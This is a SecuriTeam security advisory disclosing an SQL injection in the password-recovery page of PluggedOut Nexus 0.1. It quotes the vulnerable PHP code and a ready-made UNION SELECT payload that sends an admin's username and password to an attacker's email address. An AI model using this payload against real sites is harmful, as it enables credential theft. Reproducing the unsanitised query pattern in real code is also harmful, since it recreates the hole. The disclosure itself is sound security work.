[UNIX] PluggedOut Nexus SQL injection

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.

- - - - - - - - -

PluggedOut Nexus SQL injection


<http://www.pluggedout.com> Nexus is "an open source script you can run
on your web server to give you a community based website where people can
register, search each others interests, and communicate with one another
either through a private messaging system, or via chat". An SQL injection
vulnerability in the Nexus PluggedOut product allows remote attackers to
gain access to the hashed password of any user they desire.


Vulnerable Systems:
* PluggedOut Nexus version 0.1

The forgotten_password.php file doesn't not properly sanitize the 'email'
parameter, allowing remote attackers to inject arbitrary SQL into the
file's password recovery SQL statement.

Vulnerable code:
The following lines in "forgotten_password.php" :
if ($_POST["submit"]!=""){
$con = db_connect();
$sql = "SELECT cUsername,cPassword,cEMailPrivate FROM nexus_users
WHERE cEMailPrivate='".$_POST["email"]."'";
$result = mysql_query($sql,$con);
if ($result!=false){
if (mysql_num_rows($result)>0){
$row = mysql_fetch_array($result);
$from = $site_admin_email;
$to = $row["cEMailPrivate"];
$subject = "Reminder Username/Password from
$body = "This email has been sent following a
request for a reminder username/password in the
".$site_long_name." website.\n\n"
."Your account details are as follows;\n"
." Username : ".$row["cUsername"]."\n"
." Password : ".$row["cPassword"]."\n\n"
."If you did not request this reminder
message, please contact the ".$site_long_name." administrator


Insert the following SQL statement into the email address
hamidnetworksecurityteam' union select
cUsername,cPassword,'ATTACKER@xxxxxxxxxxxxx' from nexus_users WHERE
nUserId=1 and '1'='1

Which will cause the ATTACKER@xxxxxxxxxxxxx to receive an email that
contains the username & password for userID=1.


The original article can be found at: <http://hamid.ir/security/>
The information has been provided by <mailto:het_ebadi@xxxxxxxxx> h e.


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.